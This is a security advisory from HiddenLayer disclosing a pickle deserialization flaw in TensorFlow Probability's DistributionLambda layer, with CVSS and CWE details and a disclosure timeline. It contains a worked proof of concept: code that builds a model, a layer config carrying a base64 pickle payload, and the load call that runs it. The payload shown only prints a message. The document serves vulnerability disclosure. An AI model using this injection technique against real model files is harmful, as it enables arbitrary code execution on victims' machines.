HiddenLayer, a Gartner recognized Cool Vendor for AI Security, is the leading provider of Security for AI. Its security platform helps enterprises safeguard the machine learning models behind their most important products. HiddenLayer is the only company to offer turnkey security for AI that does not add unnecessary complexity to models and does not require access to raw data and algorithms. Founded by a team with deep roots in security and ML, HiddenLayer aims to protect enterprise’s AI from inference, bypass, extraction attacks, and model theft. The company is backed by a group of strategic investors, including M12, Microsoft’s Venture Fund, Moore Strategic Ventures, Booz Allen Ventures, IBM Ventures, and Capital One Ventures.
July 11, 2024
Deserialization of untrusted data leading to arbitrary code execution
SAI Advisory Reference Number
SAI-ADV-2024-001
Summary
Execution of arbitrary code can be achieved through the deserialization process in the tensorflow_probability/python/layers/distribution_layer.py file within the function _deserialize_function. An attacker can inject a malicious pickle object into an HDF5 formatted model file, which will be deserialized via pickle when the model is loaded, executing the malicious code on the victim machine. An attacker can achieve this by injecting a pickle object into the DistributionLambda layer of the model under the make_distribution_fn key.
Products Impacted
This potential attack vector is present in Tensorflow Probability v0.7 and newer.
CVSS Score: 7.8
AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
CWE Categorization
CWE-502: Deserialization of Untrusted Data.
Details
To replicate this attack, we create a basic sample model based on examples found in the docstrings within the code:
import tensorflow as tf
import tensorflow_probability as tfp
from tensorflow_probability.python.internal import tf_keras
from tensorflow_probability.python.distributions import normal as normal_lib
from tensorflow_probability.python.layers import distribution_layer
tfk = tf_keras
tfkl = tf_keras.layers
tfd = tfp.distributions
tfpl = tfp.layers
model = tfk.Sequential([
tfkl.Dense(2, input_shape=(5,)),
distribution_layer.DistributionLambda(lambda t: normal_lib.Normal(
loc=t[..., 0:1], scale=tf.exp(t[..., 1:2])))
])
model.save("distribution_lambda_clean.h5")
We then use h5py to inject a base64 encoded pickle object into the model file as a new DistributionLambda layer. The resulting string is added to the model as part of the DistributionLambda layer under the make_distribution_fn key:
{"class_name": "DistributionLambda",
"config": {"name": "distribution_lambda", "trainable": true,
"dtype": "float32", "function": ["4wA...Q==\n",
null, ["sample", ""]], "function_type": "lambda",
"module": "tensorflow_probability.python.layers.distribution_layer",
"output_shape": null, "output_shape_type": "raw",
"output_shape_module": null, "arguments": {},
"make_distribution_fn": "gASVMQAAAAAAAACMCGJ1aWx0aW5zlIwFcHJpbnSUk5SMFEluamVjdGlvbiBzdWNjZXNzZnVslIWUUpQu",
"convert_to_tensor_fn": "sample"}}]}}
We then make a call to load the model from the perspective of a victim user:
import tensorflow as tf
import tensorflow_probability as tfp
loaded_model = tf.keras.models.load_model(
'distribution_lambda_clean.h5', custom_objects={
'DistributionLambda': tfp.layers.DistributionLambda
})
This sends the model through _deserialize_function, which decodes the value within make_distribution_function and runs pickle.loads on it, leading to the execution of the injected arbitrary code (in our case, to print ‘Injection Successful’):
def _deserialize_function(code):
raw_code = codecs.decode(code.encode('ascii'), 'base64')
return pickle.loads(raw_code)
Timeline
June 25, 2024 — Reported through Google’s open source VDP
June 28, 2024 — Response from vendor stating the security risk described in this report does not meet the threshold required for this type of escalation on behalf of the security team, but they are happy for us to disclose this as an advisory
July 11, 2024 — Advisory disclosure